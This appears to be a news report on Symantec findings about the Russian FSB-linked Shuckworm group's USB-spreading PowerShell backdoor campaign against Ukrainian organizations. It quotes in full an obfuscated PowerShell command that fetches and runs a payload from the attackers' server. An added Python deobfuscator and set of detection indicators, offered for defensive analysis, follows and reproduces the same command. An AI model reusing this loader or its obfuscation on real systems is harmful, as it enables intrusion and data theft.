Hackers working for Russia’s Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.
“The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information,” researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. “There were indications in some organizations that the attackers were on the machines of the organizations’ human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.”
The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russia’s FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne said the hacking group had “attacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.”
In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining sensitive military information that could be abused in Russia’s ongoing invasion.
This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine to create a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and proof.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they’ll install Pterodo on their machines.
The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are deliberately kept off the Internet in an attempt to prevent them from being hacked.
To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.
Shuckworm typically uses phishing emails as an initial vector into targets’ computers. The emails contain malicious attachments that masquerade as files with extensions including .docx, .rar, .sfx, .lnk, and .hta. Emails often use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.
Symantec researchers said that an infected computer they recovered in the campaign was typical of the way the attack works. They wrote:
In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt="/get."+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr="htt"+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with as many as 25 new variants of the group’s scripts observed per month between January and April 2023.
Thursday’s post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they’ve been targeted. The post also warns that the group poses a threat that targets should take seriously.
“This activity demonstrates that Shuckworm’s relentless focus on Ukraine continues,” they wrote. “It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations.”
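As an added example (not code from the article or from Symantec), the Python below statically folds the [char](a+b) arithmetic and string concatenation in the PowerShell command quoted above to recover the hostname and path the script assembles, and lists the behavioural traits a detection rule can match on regardless of the rotated hostnames and IP addresses. The sample is the page's own command; the placeholder <$addr> marks the one value that exists only at runtime, and the indicator names are assumptions for this demo.

```python
import re
# Body of the Shuckworm first-stage command quoted on the page (variable names restored).
SAMPLE = (
    '$gt="/get."+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);'
    '[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};'
    "$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);"
    '$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];'
    '$client=(new-object net.webclient);$faddr="htt"+\'ps://\'+$addr+$gt;'
    '$text=$client.downloadstring($faddr);iex $text'
)
TOKEN_RE = re.compile(  # [char](n), [char](a+b), a quoted literal, or a $variable
    r'\[char\]\(\s*(\d+)\s*(?:\+\s*(\d+))?\s*\)|"([^"]*)"|\'([^\']*)\'|\$(\w+)', re.I)
ASSIGN_RE = re.compile(r'\s*\$(\w+)\s*(\+?=)\s*(.*)$', re.S)

def fold_expr(expr, env):
    """Concatenate tokens joined by '+'. Returns None if anything else (a method
    call, indexer or cmdlet) appears, so runtime-only values are never guessed."""
    out, pos = [], 0
    for m in TOKEN_RE.finditer(expr):
        if expr[pos:m.start()].strip(' +'):
            return None
        a, b, dq, sq, ref = m.groups()
        out.append(chr(int(a) + int(b or 0)) if a is not None else
                   env.get(ref.lower(), '<$%s>' % ref) if ref is not None else
                   dq if dq is not None else sq)
        pos = m.end()
    return None if expr[pos:].strip(' +') else ''.join(out)

def resolve_strings(script):
    """Statically fold every `$v=` / `$v+=` string assignment, in script order."""
    env = {}
    for stmt in script.split(';'):
        m = ASSIGN_RE.match(stmt)
        if m:
            name, op, expr = m.group(1).lower(), m.group(2), m.group(3)
            value = fold_expr(expr, env)
            if value is not None:
                env[name] = env.get(name, '') + value if op == '+=' else value
    return env

def indicators(script):
    """Behavioural indicators a rule can key on regardless of rotated hosts/IPs."""
    s, found = script.lower(), []
    if re.search(r'servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}', s):
        found.append('tls_validation_disabled')
    if len(re.findall(r'\[char\]\(', s)) >= 3:
        found.append('char_arithmetic_obfuscation')
    if 'downloadstring(' in s and re.search(r'\b(iex|invoke-expression)\b', s):
        found.append('download_and_invoke')
    return found
```

Running resolve_strings(SAMPLE) yields the hostname in 'hosta' and 'https://<$addr>/get.php' in 'faddr'; indicators(SAMPLE) fires all three traits even though none of them depends on the domain or address the group rotates.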